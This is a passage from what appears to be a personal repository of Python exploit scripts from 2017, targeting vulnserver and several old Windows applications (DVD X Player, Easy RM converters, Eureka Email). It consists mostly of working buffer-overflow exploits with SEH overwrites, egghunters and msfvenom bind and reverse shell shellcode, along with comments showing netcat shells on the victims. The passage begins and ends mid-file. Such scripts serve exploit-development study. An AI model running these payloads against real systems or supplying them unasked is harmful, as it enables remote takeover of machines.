"\x2A\x2D\x52\x32\x32\x32\x2D\x31\x31\x31\x31\x2D\x6E\x5A\x4A\x32" 102 | egghunter2 += "\x41\x41\x41\x41\x71\x06\x70\x04" # JMP FRONT 103 | 104 | # Third stage encoded egghunter 105 | # Payload Size: 120 Bytes 106 | egghunter3 = "\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x2D" 107 | egghunter3 += "\x77\x44\x2D\x31\x2D\x77\x44\x2D\x38\x24\x47\x77\x50\x41\x41\x41" 108 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 109 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 110 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 111 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 112 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 113 | egghunter3 += "\x41\x41\x41\x41\x71\x06\x70\x04" #JMP FRONT 114 | 115 | jmpback1 = nseh + nops 116 | jmpback2 = nseh + egghunter3 117 | jmpback3 = nseh + egghunter2 118 | 119 | # evil = junk + nSEH + SEH + junk 120 | evil = "A"*1500 + shellcode 121 | evil += "A"*(3495-len(jmpback1)-len(jmpback2)-len(jmpback3)-len(egghunter1)-len(shellcode)-1500) 122 | evil += egghunter1 + jmpback3 + jmpback2 + jmpback1 + nseh + seh 123 | evil += "D"*497 124 | 125 | data = "LTER /.:/" + evil 126 | 127 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 128 | expl.connect(("10.0.0.35", 9999)) 129 | expl.send(data) 130 | expl.close() 131 | -------------------------------------------------------------------------------- /exploit-TRUN.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - TRUN - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-TRUN.py 22 | # root@kali:~# nc -nv 10.10.0.20 443 23 | # (UNKNOWN) [10.10.0.20] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp esp found at 0x625011af - essfunc.fll 39 | ret = "\xaf\x11\x50\x62" 40 | 41 | # few nops before shellcode 42 | nops = "\x90"*10 43 | 44 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 45 | # Payload Size: 356 Bytes 46 | shellcode = "" 47 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 48 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 49 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 50 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 51 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 52 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 53 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 54 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 55 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 56 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 57 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 58 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 59 | shellcode += 
"\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 60 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 61 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 62 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 63 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 64 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 65 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 66 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 67 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 68 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 69 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 70 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 71 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 72 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 73 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 74 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 75 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 76 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 77 | 78 | evil = "A"*2003 + ret + nops + shellcode + "C"*(993-len(shellcode)-len(nops)) 79 | 80 | data = "TRUN /.:/" + evil 81 | 82 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 83 | expl.connect(("10.10.0.20", 9999)) 84 | expl.send(data) 85 | expl.close() 86 | -------------------------------------------------------------------------------- /exploit-dvdxplayer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit DVD X Player 5.5 - Playlist .sfl Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2 (Metasploitable will do) and Kali. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe 11 | # - pattern_create.rb and pattern_offset.rb = 260 12 | # - Bachars = \x00\x0a\x0d\x1a 13 | # - Return Address found at 0x616525cb (JMP ESP) | EPG.dll 14 | # - Generated the payload using msfvenom 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # C:\Python27>python.exe exploit-dvdxplayer.py 19 | # C:\Python27> 20 | # - Open DVD X Player 5.5, click on "Later", "Open Playlist...", and select C:\Python27\exploit.plf 21 | # Kali: 22 | # root@kali:~# nc -nlvp 443 23 | # listening on [any] 443 ... 24 | # connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047 25 | # Microsoft Windows XP [vers�o 5.1.2600] 26 | # (C) Copyright 1985-2001 Microsoft Corp. 27 | # 28 | # C:\Python27> 29 | # 30 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 31 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
32 | # 33 | # 34 | 35 | eip = "\xcb\x25\x65\x61" 36 | nops = "\x90"*100 37 | filename = "exploit.plf" 38 | 39 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" 40 | #Payload size: 351 bytes 41 | 42 | shellcode = ("\xbd\xb1\xd0\x2c\xb6\xd9\xc2\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 43 | "\x52\x31\x6a\x12\x83\xc2\x04\x03\xdb\xde\xce\x43\xe7\x37\x8c" 44 | "\xac\x17\xc8\xf1\x25\xf2\xf9\x31\x51\x77\xa9\x81\x11\xd5\x46" 45 | "\x69\x77\xcd\xdd\x1f\x50\xe2\x56\x95\x86\xcd\x67\x86\xfb\x4c" 46 | "\xe4\xd5\x2f\xae\xd5\x15\x22\xaf\x12\x4b\xcf\xfd\xcb\x07\x62" 47 | "\x11\x7f\x5d\xbf\x9a\x33\x73\xc7\x7f\x83\x72\xe6\x2e\x9f\x2c" 48 | "\x28\xd1\x4c\x45\x61\xc9\x91\x60\x3b\x62\x61\x1e\xba\xa2\xbb" 49 | "\xdf\x11\x8b\x73\x12\x6b\xcc\xb4\xcd\x1e\x24\xc7\x70\x19\xf3" 50 | "\xb5\xae\xac\xe7\x1e\x24\x16\xc3\x9f\xe9\xc1\x80\xac\x46\x85" 51 | "\xce\xb0\x59\x4a\x65\xcc\xd2\x6d\xa9\x44\xa0\x49\x6d\x0c\x72" 52 | "\xf3\x34\xe8\xd5\x0c\x26\x53\x89\xa8\x2d\x7e\xde\xc0\x6c\x17" 53 | "\x13\xe9\x8e\xe7\x3b\x7a\xfd\xd5\xe4\xd0\x69\x56\x6c\xff\x6e" 54 | "\x99\x47\x47\xe0\x64\x68\xb8\x29\xa3\x3c\xe8\x41\x02\x3d\x63" 55 | "\x91\xab\xe8\x24\xc1\x03\x43\x85\xb1\xe3\x33\x6d\xdb\xeb\x6c" 56 | "\x8d\xe4\x21\x05\x24\x1f\xa2\x20\xb9\x1f\x16\x5d\xbb\x1f\x57" 57 | "\x26\x32\xf9\x3d\x48\x13\x52\xaa\xf1\x3e\x28\x4b\xfd\x94\x55" 58 | "\x4b\x75\x1b\xaa\x02\x7e\x56\xb8\xf3\x8e\x2d\xe2\x52\x90\x9b" 59 | "\x8a\x39\x03\x40\x4a\x37\x38\xdf\x1d\x10\x8e\x16\xcb\x8c\xa9" 60 | "\x80\xe9\x4c\x2f\xea\xa9\x8a\x8c\xf5\x30\x5e\xa8\xd1\x22\xa6" 61 | "\x31\x5e\x16\x76\x64\x08\xc0\x30\xde\xfa\xba\xea\x8d\x54\x2a" 62 | "\x6a\xfe\x66\x2c\x73\x2b\x11\xd0\xc2\x82\x64\xef\xeb\x42\x61" 63 | "\x88\x11\xf3\x8e\x43\x92\x03\xc5\xc9\xb3\x8b\x80\x98\x81\xd1" 64 | "\x32\x77\xc5\xef\xb0\x7d\xb6\x0b\xa8\xf4\xb3\x50\x6e\xe5\xc9" 65 | "\xc9\x1b\x09\x7d\xe9\x09") 66 | 67 | buffer = "A"*260 + eip + nops + shellcode + "C"*(2000-260-4-100-351) 68 | 69 | textfile = 
open(filename, 'w') 70 | textfile.write(buffer) 71 | textfile.close() 72 | -------------------------------------------------------------------------------- /exploit-easy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH) (Using egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/8074acabe998c5a7af650019c61dd80b-easy_rm_to_dvd.exe 11 | # 12 | # Development Proccess: 13 | # - https://medium.com/@rafaveira3/exploit-development-easy-rm-rmvb-to-dvd-burner-1-8-11-seh-overflow-example-1-4b5ac6de5adc 14 | # 15 | # PoC: 16 | # Windows XP: 17 | # - Install Easy RM RMVB to DVD Burner 1.8.11 (next -> next -> finish) 18 | # C:\Python27\python.exe exploit-easy.py 19 | # - Open exploit.txt on a text editor and Ctrl + C its content 20 | # - Open Easy RM RMVB to DVD Burner 1.8.11 and click Register 21 | # - In "Enter User Name:" Ctrl + V and press OK 22 | # - Open cmd.exe and type : netstat -ano | find ":4444" 23 | # Kali: 24 | # root@kali:~# nc -nv 10.10.0.20 4444 25 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 26 | # Microsoft Windows XP [Version 5.1.2600] 27 | # (C) Copyright 1985-2001 Microsoft Corp. 28 | # 29 | # C:\Program Files\Easy RM RMVB to DVD Burner> 30 | # 31 | # 32 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 33 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
34 | # 35 | # Infos: 36 | # - pattern_create + pattern_offset = 1000 37 | # - pop pop ret found usgin mona at 0x10037859 of SkinMagic.dll (SafeSEH: False) 38 | # - jmp back 128 bytes = \xEB\x80 39 | # - egghunter generated with mona (egg r4f4) 40 | # - shellcode generated with msfvenom 41 | 42 | # Size 32 Bytes 43 | # Egg = r4f4 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 45 | 46 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 47 | # Size = 718 bytes 48 | shellcode = "" 49 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 50 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 51 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 52 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 53 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 54 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 55 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 56 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 57 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 58 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 59 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 60 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 61 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 62 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 63 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 64 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 65 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 66 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 67 | shellcode += 
"\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 68 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 69 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 70 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 71 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 72 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 73 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 74 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 75 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 76 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 77 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 78 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 79 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 80 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 81 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 82 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 83 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 84 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 85 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 86 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 87 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 88 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 89 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 90 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 91 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 92 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 93 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 94 | shellcode += 
"\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 95 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 96 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 97 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 98 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 99 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 100 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 101 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 102 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 103 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 104 | shellcode += "\x45\x41\x41" 105 | 106 | buffer = "A" * 764 + "\x90" *150 + egghunter + "\x90"*50 + "B" * 2 + "\xEB\x80" + "\x59\x78\x03\x10" + "r4f4r4f4" + shellcode 107 | 108 | 109 | data = buffer 110 | 111 | f = open("exploit.txt", "w") 112 | f.write(data) 113 | f.close() 114 | -------------------------------------------------------------------------------- /exploit-easyrmtomp3converter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Easy RM to MP3 Converter Exploit - Local Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2 (Metasploitable will do) and Kali. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe 11 | # - pattern_create.rb and pattern_offset.rb = 26100 12 | # - Badchars = \x00\x09\x0a 13 | # - Return Address found at 0x7c941eed (JMP ESP) | C:\Arquivos de programas\Easy RM to MP3 Converter\MSRMfilter03.dll 14 | # - Generated the payload using msfvenom 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # C:\Python27>python.exe exploit-easyrmtomp3converter.py 19 | # C:\Python27> 20 | # - Open Easy RM to MP3 Converter, click on "Load", and select C:\Python27\evil.m3u 21 | # Kali: 22 | # root@kali:~# nc -nlvp 443 23 | # listening on [any] 443 ...connect to [10.0.0.36] from (UNKNOWN) [10.0.0.45] 1083 24 | # Microsoft Windows XP [versao 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Arquivos de programas\Easy RM to MP3 Converter> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
31 | # 32 | # 33 | 34 | filename = "evil.m3u" 35 | eip = "\xed\x1e\x94\x7c" 36 | nops = "\x90"*100 37 | 38 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a" 39 | # Payload size: 351 bytes 40 | 41 | shellcode = ("\xba\x9b\x9c\xbb\x42\xd9\xf6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 42 | "\x52\x83\xee\xfc\x31\x56\x0e\x03\xcd\x92\x59\xb7\x0d\x42\x1f" 43 | "\x38\xed\x93\x40\xb0\x08\xa2\x40\xa6\x59\x95\x70\xac\x0f\x1a" 44 | "\xfa\xe0\xbb\xa9\x8e\x2c\xcc\x1a\x24\x0b\xe3\x9b\x15\x6f\x62" 45 | "\x18\x64\xbc\x44\x21\xa7\xb1\x85\x66\xda\x38\xd7\x3f\x90\xef" 46 | "\xc7\x34\xec\x33\x6c\x06\xe0\x33\x91\xdf\x03\x15\x04\x6b\x5a" 47 | "\xb5\xa7\xb8\xd6\xfc\xbf\xdd\xd3\xb7\x34\x15\xaf\x49\x9c\x67" 48 | "\x50\xe5\xe1\x47\xa3\xf7\x26\x6f\x5c\x82\x5e\x93\xe1\x95\xa5" 49 | "\xe9\x3d\x13\x3d\x49\xb5\x83\x99\x6b\x1a\x55\x6a\x67\xd7\x11" 50 | "\x34\x64\xe6\xf6\x4f\x90\x63\xf9\x9f\x10\x37\xde\x3b\x78\xe3" 51 | "\x7f\x1a\x24\x42\x7f\x7c\x87\x3b\x25\xf7\x2a\x2f\x54\x5a\x23" 52 | "\x9c\x55\x64\xb3\x8a\xee\x17\x81\x15\x45\xbf\xa9\xde\x43\x38" 53 | "\xcd\xf4\x34\xd6\x30\xf7\x44\xff\xf6\xa3\x14\x97\xdf\xcb\xfe" 54 | "\x67\xdf\x19\x50\x37\x4f\xf2\x11\xe7\x2f\xa2\xf9\xed\xbf\x9d" 55 | "\x1a\x0e\x6a\xb6\xb1\xf5\xfd\xb3\x45\xf5\xd9\xab\x47\xf5\x20" 56 | "\x97\xc1\x13\x48\xf7\x87\x8c\xe5\x6e\x82\x46\x97\x6f\x18\x23" 57 | "\x97\xe4\xaf\xd4\x56\x0d\xc5\xc6\x0f\xfd\x90\xb4\x86\x02\x0f" 58 | "\xd0\x45\x90\xd4\x20\x03\x89\x42\x77\x44\x7f\x9b\x1d\x78\x26" 59 | "\x35\x03\x81\xbe\x7e\x87\x5e\x03\x80\x06\x12\x3f\xa6\x18\xea" 60 | "\xc0\xe2\x4c\xa2\x96\xbc\x3a\x04\x41\x0f\x94\xde\x3e\xd9\x70" 61 | "\xa6\x0c\xda\x06\xa7\x58\xac\xe6\x16\x35\xe9\x19\x96\xd1\xfd" 62 | "\x62\xca\x41\x01\xb9\x4e\x71\x48\xe3\xe7\x1a\x15\x76\xba\x46" 63 | "\xa6\xad\xf9\x7e\x25\x47\x82\x84\x35\x22\x87\xc1\xf1\xdf\xf5" 64 | "\x5a\x94\xdf\xaa\x5b\xbd") 65 | 66 | buffer = "A"*26100 + eip + nops + shellcode + "C"*(30000-26100-4-100) 67 | 68 | textfile = 
open(filename, 'w') 69 | textfile.write(buffer) 70 | textfile.close 71 | -------------------------------------------------------------------------------- /exploit-eureka.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Eureka Email Client - Remote Buffer Overflow (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/2b0e55c58e1355c4bd0143d06ce3d239-EurekaEmailSetup.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install Eureka (next -> next -> finish) 15 | # - Setup Eureka to use Kali as a SMTP server 16 | # - Open cmd.exe and type : netstat -ano | find ":4444" 17 | # - Open Eureka and click on File -> Send and receive e-mails 18 | # Kali: 19 | # root@kali:~# python exploit-eureka.py 20 | # [*] Listening on port 110. 21 | # [*] Have someone connect to you. 22 | # [*] Type -c to exit. 23 | # [*] Received connection from: ('10.10.0.20', 1076) 24 | # [*] Done. 25 | # root@kali:~# nc -nv 10.10.0.20 4444 26 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 27 | # Microsoft Windows XP [Version 5.1.2600] 28 | # (C) Copyright 1985-2001 Microsoft Corp. 29 | # 30 | # C:\Program Files\Eureka Email> 31 | # 32 | # 33 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 34 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
35 | # 36 | # Infos: 37 | # - pattern_create + pattern_offset = 713 38 | # - Return Address found at 0x77fab227 (JMP ESP) | SHLWAPI.dll 39 | # - egghunter generated with mona (egg r4f4) 40 | # - shellcode generated with msfvenom 41 | 42 | import sys 43 | import socket 44 | 45 | 46 | # Size: 32 bytes 47 | # Egg: r4f4 48 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 49 | 50 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 51 | # Size = 718 bytes 52 | shellcode = "" 53 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 54 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 55 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 56 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 57 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 58 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 59 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 60 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 61 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 62 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 63 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 64 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 65 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 66 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 67 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 68 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 69 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 70 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 71 | shellcode += 
